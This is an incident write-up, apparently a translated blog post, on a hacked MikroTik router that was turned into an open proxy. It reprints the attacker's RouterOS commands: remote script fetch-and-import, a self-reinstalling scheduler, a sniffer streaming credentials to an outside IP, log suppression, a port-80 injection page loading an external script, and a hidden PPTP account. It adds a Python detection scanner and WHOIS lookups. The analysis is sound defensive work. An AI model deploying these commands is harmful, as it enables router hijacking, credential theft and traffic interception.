After being hacked, the MikroTik became a PROXY spy

Consequences and aftermath of a MikroTik compromise
Recently I ran into a glitchy MikroTik: it started dropping packets and lost Winbox management.
Logging in locally by MAC address, I could see the CPU pegged at 100%, about 3000 entries in the firewall connection table, and just one line in the log. The Winbox port had been changed.
A MikroTik with a public IP, running RouterOS 6.42.7.
Well, obviously!
The MikroTik had been hacked!
First I switched off the web proxy, which hundreds of users were sitting on.
Switched off SOCKS.
Then I looked at the firewall rules and mangle.
Oh horror! It's an open proxy server! Traffic is being redirected and intercepted.
It's already listed in every open-proxy list out there! Damn!

So, in order, here is how the villains, the MikroTik-breakers, did it.
In the terminal I looked at the last commands:
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove [find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-100.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp sec add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,1500,10000

(The sniffer streams all FTP, POP3 and IMAP traffic, cleartext logins included, plus ports 1500 and 10000, from every interface straight to 37.1.207.114.)

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fetch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"

(This scheduler re-downloads and imports cmd.txt every minute, so any manual cleanup of the config is undone within 60 seconds unless this entry is removed first.)


From the last one it was clear that a batch of commands was being pulled from src-ip.com/cmd.txt.
The code (note the very first line: it cuts the memory log down to a single entry, which is why the log showed only one line):
/system logging action set memory memory-lines=1
/system scheduler add interval=25m name="DDNS Serv" on-event="/system script run iDDNS" start-time=startup
/system scheduler
add interval=20m name="DDNS Backup" start-time=startup on-event=":global\
    \_mac [/interface ethernet get 0 mac-address]\r\
    \n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
    \"_\".[/ip proxy get port])\r\
    \n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\
    \n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
    \n:do {/tool fetch address=azdns.ru src-path=\$cmd mode=http dst-path=dn\
    s} on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pa\
    th=dns}\r\
    \n:delay 3s;/import dns;:delay 4s;/file remove dns"
/system scheduler
add interval=24h name="DDNS reLoad" start-time=startup on-event="/tool fetch url=http://src.click/error.html mode=http dst-path=flash/webproxy/error.html;/tool fetch url=http://src.click/error.html mode=http dst-path=webproxy/error.html"
/ip dns set allow-remote-requests=yes servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
/ip socks set enabled=yes port=("3".[:pick [/system clock get time ] 3 5].[:pick [/system clock get time] 6 8])
/ip socks access remove [/ip socks access find]
/ip proxy set anonymous=no enabled=yes port=8080 src-address=::
/ip proxy access remove [/ip proxy access find]
/ip proxy access add action=deny disabled=no
/ip firewall nat remove [find comment=sysadminpxy]
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move [find comment=sysadminpxy] destination=0
/ip firewall filter remove [find comment=sysadminpxy]
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/ip service set winbox port=("4".[:pick [/system clock get time ] 3 5].[:pick [/system clock get time] 6 8]);/ip service disable telnet,ftp,www-ssl,api,api-ssl,ssh
/tool fetch url=http://src.click/error.html mode=http dst-path=flash/webproxy/error.html
/tool fetch url=http://src.click/error.html mode=http dst-path=webproxy/error.html
:do {/ppp secret add name=srcvpn service=any password=[/interface ethernet get 0 mac-address] profile=default-encryption local-address=192.168.1.1 remote-address=192.168.1.101;/interface pptp-server server set enabled=yes max-mtu=1500 max-mru=1500} on-error={}
:delay 8s;/file remove final.rsc;/system scheduler remove RE_CMD
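A practical way to check other boxes for the same implant is to run an /export (or the pasted terminal history) through a scanner keyed on the indicators above: the self-reinstalling scheduler, the sniffer streaming target, the one-line log buffer, SOCKS and web proxy enablement, the port-80 redirect, clock-derived service ports and the MAC-as-password PPP secret. The script below is an added example, not code from the original post or from MikroTik; the sample dump is constructed from the commands shown above, and the rule list and helper names are my own.

```python
"""Scan a RouterOS /export (or pasted terminal history) for the implant
indicators shown in this post.  Added example, not from the original page:
rules distilled from the attacker's commands above, sample dump constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample in /export form: attacker entries plus one benign scheduler.
SAMPLE_EXPORT = r"""
/system logging action
set memory memory-lines=1
/system scheduler
add name="CMD_OS" start-time=startup interval=1m on-event="/tool fetch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"
add interval=20m name="DDNS Backup" start-time=startup on-event=":global\
    \_mac [/interface ethernet get 0 mac-address]\r\
    \n:do {/tool fetch address=azdns.ru src-path=\$cmd mode=http dst-path=dns} on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-path=dns}\r\
    \n:delay 3s;/import dns;:delay 4s;/file remove dns"
add interval=1d name=nightly start-time=startup on-event="/system backup save name=nightly"
/tool sniffer
set streaming-server=37.1.207.114 streaming-enabled=yes
/ip socks
set enabled=yes port=("3".[:pick [/system clock get time] 3 5].[:pick [/system clock get time] 6 8])
/ip proxy
set anonymous=no enabled=yes port=8080 src-address=::
/ip firewall nat
add chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ppp secret
add name=srcvpn service=any password=[/interface ethernet get 0 mac-address] profile=default-encryption
/interface pptp-server server
set enabled=yes max-mtu=1500 max-mru=1500
"""

VERBS = {"add", "set", "remove", "disable", "enable", "move", "run"}

def normalise(text: str) -> list[str]:
    """One complete command per line: join backslash-continued lines and
    prefix bare verbs with the menu path that /export prints above them."""
    joined, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        joined.append(buf + line)
        buf = ""
    if buf:
        joined.append(buf)
    commands, menu = [], ""
    for line in joined:
        if not line or line.startswith("#"):
            continue
        if line.startswith("/") and "=" not in line and not (set(line.split()) & VERBS):
            menu = line                          # bare menu path, e.g. "/ip socks"
        else:
            commands.append(f"{menu} {line}" if line.split()[0] in VERBS else line)
    return commands

@dataclass
class Finding:
    severity: str
    rule: str
    command: str

# (severity, description, pattern), checked against every normalised command.
RULES = [
    ("high", "scheduler fetches a script over HTTP and imports it",
     re.compile(r"/system scheduler .*on-event=.*fetch .*(?:/import|/im )")),
    ("high", "packet sniffer streams traffic to a remote host",
     re.compile(r"/tool sniffer set .*streaming-server=")),
    ("high", "memory log buffer cut to one line",
     re.compile(r"/system logging action set .*memory-lines=1(?!\d)")),
    ("high", "SOCKS proxy enabled", re.compile(r"/ip socks set .*enabled=yes")),
    ("high", "web proxy enabled", re.compile(r"/ip proxy set .*enabled=yes")),
    ("high", "port 80 redirected into the local proxy",
     re.compile(r"chain=dstnat .*dst-port=80 .*action=redirect")),
    ("medium", "service port derived from the clock (moving target)",
     re.compile(r'port=\("\d"\.\[:pick \[/system clock get time')),
    ("medium", "PPTP server enabled",
     re.compile(r"/interface pptp-server server set .*enabled=yes")),
    ("medium", "PPP secret whose password is the device MAC",
     re.compile(r"/ppp secret add .*password=\[/interface ethernet get 0 mac-address\]")),
]

def scan_export(text: str) -> list[Finding]:
    """One Finding per (command, rule) hit; a command may trip several rules."""
    return [Finding(sev, rule, cmd) for cmd in normalise(text)
            for sev, rule, pat in RULES if pat.search(cmd)]

def external_hosts(text: str) -> set[str]:
    """Hosts the config reaches out to: block them, hunt for them in flow logs."""
    blob = "\n".join(normalise(text))
    hosts = set(re.findall(r"url=https?://([^/\s\"]+)", blob))
    hosts.update(re.findall(r"fetch address=([^\s\"]+)", blob))
    hosts.update(re.findall(r"streaming-server=([\d.]+)", blob))
    return hosts

if __name__ == "__main__":
    for f in scan_export(SAMPLE_EXPORT):
        print(f"[{f.severity:6}] {f.rule}: {f.command[:60]}")
    print("hosts to block:", sorted(external_hosts(SAMPLE_EXPORT)))
```

Feed it the output of /export from a suspect router; the benign nightly backup scheduler in the sample shows that a scheduler is only flagged when it both fetches over HTTP and imports the result. The clock-derived port pattern is worth keeping even after cleanup, since a 3MMSS or 4MMSS Winbox/SOCKS port is a strong sign of this particular implant.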


src.click/error.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>$(url)</title>
    <style>
        .full-screen-preview {
            height: 100%;
            padding: 0px;
            margin: 0px;
            overflow: hidden
        }
        
        .full-screen-preview__frame {
            display: block;
            background: #fff;
            border: none;
            height: 100vh;
            width: 100vw;
        }
    </style>
    <script src="https://priv.su/src.js"></script>
</head>

<body class="full-screen-preview">
    <script>
        var didItOpen = false;
        setTimeout(function() {
            if (!didItOpen) window.frames['load-url'].location = '$(url)';
        }, 10);
    </script>
    <iframe class="full-screen-preview__frame" name="load-url" frameborder="0" noresize="noresize"></iframe>
</body>

</html>
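The two rules tagged comment=sysadminpxy in cmd.txt and this error.html work together: the dstnat rule sends any port-80 connection from a source that is not yet in the "Ok" address list into the web proxy on 8080, the input rule adds that source to "Ok" for 15 seconds, and the proxy (whose only access rule is action=deny) answers with error.html with $(url) filled in. That page loads priv.su/src.js in the top frame and then iframes the original URL; the iframe's request comes from an address that is now in "Ok", so it goes direct and the real site renders inside the attacker's frame. The model below is an added example, not code from the original post or from MikroTik; the Router class, its method names and the request timeline are my own, while the decision logic follows the two rules literally.

```python
"""Model of the 'sysadminpxy' firewall pair from the cmd.txt listing above.
Added example, not from the original page: Router, its method names and the
timeline are mine; the rule logic mirrors the two RouterOS rules."""
from __future__ import annotations

OK_TIMEOUT = 15.0          # address-list-timeout=15s on the input rule
PROXY_PORT = 8080          # to-ports=8080 on the dstnat rule


class Router:
    """Just enough of the firewall to reproduce the redirect/allow dance."""

    def __init__(self) -> None:
        # address-list "Ok": source IP -> time the entry expires
        self.ok_until: dict[str, float] = {}

    def in_ok_list(self, src: str, now: float) -> bool:
        return self.ok_until.get(src, float("-inf")) > now

    def handle_http(self, src: str, url: str, now: float) -> str:
        """Client `src` opens a plain-HTTP (port 80) connection to `url`.

        Returns 'direct:<url>' when the connection reaches the real site, or
        'error.html:<url>' when the proxy intercepts it and serves the
        attacker's error page with $(url) substituted."""
        # chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok
        #   action=redirect to-ports=8080
        if self.in_ok_list(src, now):
            return f"direct:{url}"
        # The redirected connection now lands on chain=input dst-port=8080:
        #   action=add-src-to-address-list address-list=Ok address-list-timeout=15s
        self.ok_until[src] = now + OK_TIMEOUT
        # The proxy's only access rule is action=deny, so the client receives
        # error.html; its iframe immediately re-requests $(url), this time from
        # an address already in "Ok", so the real page loads inside the frame.
        return f"error.html:{url}"


def simulate(timeline: list[tuple[float, str, str]]) -> list[str]:
    """Run a (seconds, client IP, URL) timeline through one Router."""
    router = Router()
    return [router.handle_http(src, url, t) for t, src, url in timeline]


# Constructed timeline: one user browsing, then a second client.
TIMELINE = [
    (0.0, "10.0.0.5", "http://example.com/"),        # first hit: intercepted
    (0.2, "10.0.0.5", "http://example.com/"),        # iframe reload: direct
    (1.0, "10.0.0.5", "http://example.com/a.css"),   # sub-resources: direct
    (14.9, "10.0.0.5", "http://example.com/next"),   # still inside the 15 s
    (40.0, "10.0.0.5", "http://example.com/later"),  # "Ok" expired: trapped again
    (40.1, "10.0.0.9", "http://example.com/"),       # other client, own timer
]


def intercepted(timeline: list[tuple[float, str, str]]) -> int:
    """How many requests in the timeline were wrapped by error.html."""
    return sum(r.startswith("error.html:") for r in simulate(timeline))


if __name__ == "__main__":
    for (t, src, url), result in zip(TIMELINE, simulate(TIMELINE)):
        print(f"{t:5.1f}s {src:10} {result}")
```

Two things fall out of the model. Only dst-port=80 is touched, so HTTPS sites pass through untouched and the injection is invisible to anyone who only tests an HTTPS page. And the 15-second "Ok" timer means a user is wrapped once per idle period rather than on every click, which is exactly the kind of intermittent symptom that gets written off as "the MikroTik is glitching".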

Not fun at all!
So who are src.click and src-ip.com?
They sit on the same IP, 173.212.202.205:

IP Address: 173.212.202.205
Decimal Representation: 2916403917
ASN: AS51167
Country: Germany (DE)
ISP / Organization: Contabo GmbH
Latitude: 51.2993° (51° 17′ 57″ N)
Longitude: 9.4910° (9° 29′ 27″ E)
PTR Resource Record: vmi212893.contaboserver.net
Private / Reserved IP Address: no / no
Timezone: Europe/Berlin
Local Time: 2018-11-24 05:55:14+01:00


Whois for src-ip.com, from whois.tldregistrarsolutions.com:
Domain Name: SRC-IP.COM
Registry Domain ID: 2295454030_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tldregistrarsolutions.com
Registrar URL: www.tldregistrarsolutions.com
Updated Date: 2018-10-17T02:13:55Z
Creation Date: 2018-08-09T16:34:13Z
Registrar Registration Expiration Date: 2020-08-09T16:34:13Z
Registrar: TLD Registrar Solutions Ltd.
Registrar IANA ID: 1564
Registrar Abuse Contact Email: abuse@tldregistrarsolutions.com
Registrar Abuse Contact Phone: +1.5167401179
Reseller:
Domain Status: clientTransferProhibited — www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Domain Admin
Registrant Organization: Whois Privacy Corp.
Registrant Street: Ocean Centre, Montagu Foreshore, East Bay Street
Registrant City: Nassau
Registrant State/Province: New Providence
Registrant Postal Code:
Registrant Country: BS
Registrant Phone: +1.5163872248
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: src-ip.com-owner-r77k@customers.whoisprivacycorp.com
Registry Admin ID:
Admin Name: Domain Admin
Admin Organization: Whois Privacy Corp.
Admin Street: Ocean Centre, Montagu Foreshore, East Bay Street
Admin City: Nassau
Admin State/Province: New Providence
Admin Postal Code:
Admin Country: BS
Admin Phone: +1.5163872248
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: src-ip.com-admin-rise@customers.whoisprivacycorp.com
Registry Tech ID:
Tech Name: Domain Admin
Tech Organization: Whois Privacy Corp.
Tech Street: Ocean Centre, Montagu Foreshore, East Bay Street
Tech City: Nassau
Tech State/Province: New Providence
Tech Postal Code:
Tech Country: BS
Tech Phone: +1.5163872248
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: src-ip.com-tech-yrk0@customers.whoisprivacycorp.com
Name Server: ns-canada.topdns.com
Name Server: ns-uk.topdns.com
Name Server: ns-usa.topdns.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: wdprs.internic.net/
>>> Last update of WHOIS database: 2018-11-24T04:50:08Z <<<

The Bahamas? HOLY CRAP, of course, HAXXORS, DAMN!



Domain Name: SRC.CLICK
Registry Domain ID: DO_127280f617ff3512314f5f0b1cb73903-UR
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2018-10-14T14:00:10
Creation Date: 2018-10-14T13:52:34
Registrar Registration Expiration Date: 2019-10-14T13:52:34
Registrar: TUCOWS, INC.
Registrar IANA ID: 69
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registry Registrant ID: 
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: REDACTED FOR PRIVACY
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: REDACTED FOR PRIVACY
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: 
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: 
Registrant Email: REDACTED FOR PRIVACY
Registry Admin ID: 
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: 
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: 
Admin Email: REDACTED FOR PRIVACY
Registry Tech ID: 
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: 
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: 
Tech Email: REDACTED FOR PRIVACY
Name Server: 1-you.njalla.no
Name Server: 2-can.njalla.in
Name Server: 3-get.njalla.fo
Registrar Abuse Contact Email: domainabuse@tucows.com
Registrar Abuse Contact Phone: +1.4165350123
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

3 comments

Exactly the same crap showed up on one of my boxes.
Congratulations, welcome to our ranks. If you can, wipe it completely and reflash it with new firmware. Keep nothing from the old passwords, only new ones.
[comment deleted]